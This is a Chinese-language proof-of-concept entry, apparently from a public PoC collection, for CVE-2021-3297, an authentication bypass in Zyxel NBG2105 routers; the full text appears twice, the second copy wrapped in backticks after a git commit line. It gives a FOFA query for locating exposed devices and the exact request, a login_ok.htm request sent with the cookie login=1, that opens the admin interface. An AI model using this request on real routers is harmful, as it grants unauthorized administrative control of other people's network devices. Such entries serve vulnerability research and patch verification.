Awesome-POC/网络设备漏洞/Zyxel NBG2105 身份验证绕过 CVE-2021-3297.md

# Zyxel NBG2105 身份验证绕过 CVE-2021-3297

## 漏洞描述

Zyxel NBG2105 存在身份验证绕过，攻击者通过更改 login参数可用实现后台登陆

## 漏洞影响

```
Zyxel NBG2105
```

## FOFA

```
app="ZyXEL-NBG2105"
```

## 漏洞复现

登录页面如下

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140930455.png)

其中前端文件 **/js/util_gw.js** 存在前端对 Cookie login参数的校验

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140930281.png)

可以看到检测到 Cookie中的 **login=1** 则跳转 home.html

```plain
function setCookie() //login_ok.htm use
{
	document.cookie="login=1";
	MM_goToURL('parent', 'home.htm');
}
```

请求如下则会以管理员身份跳转到 **home.htm页面**

```plain
http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;
```

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140931038.png)

## 参考文章

https://github.com/nieldk/vulnerabilities/blob/main/zyxel nbg2105/Admin bypass
update gitbook 2022-02-20 16:14:31 +08:00			`# Zyxel NBG2105 身份验证绕过 CVE-2021-3297`

			`## 漏洞描述`

			`Zyxel NBG2105 存在身份验证绕过，攻击者通过更改 login参数可用实现后台登陆`

			`## 漏洞影响`

			```
			`Zyxel NBG2105`
			```

			`## FOFA`

			```
			`app="ZyXEL-NBG2105"`
			```

			`## 漏洞复现`

			`登录页面如下`

			`![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140930455.png)`

			`其中前端文件 /js/util_gw.js 存在前端对 Cookie login参数的校验`

			`![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140930281.png)`

			`可以看到检测到 Cookie中的 login=1 则跳转 home.html`

			```plain
			`function setCookie() //login_ok.htm use`
			`{`
			`document.cookie="login=1";`
			`MM_goToURL('parent', 'home.htm');`
			`}`
			```

			`请求如下则会以管理员身份跳转到 home.htm页面`

			```plain
			`http://xxx.xxx.xxx.xxx/login_ok.htm`

			`Cookie: login=1;`
			```

			`![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140931038.png)`

			`## 参考文章`

			`https://github.com/nieldk/vulnerabilities/blob/main/zyxel nbg2105/Admin bypass`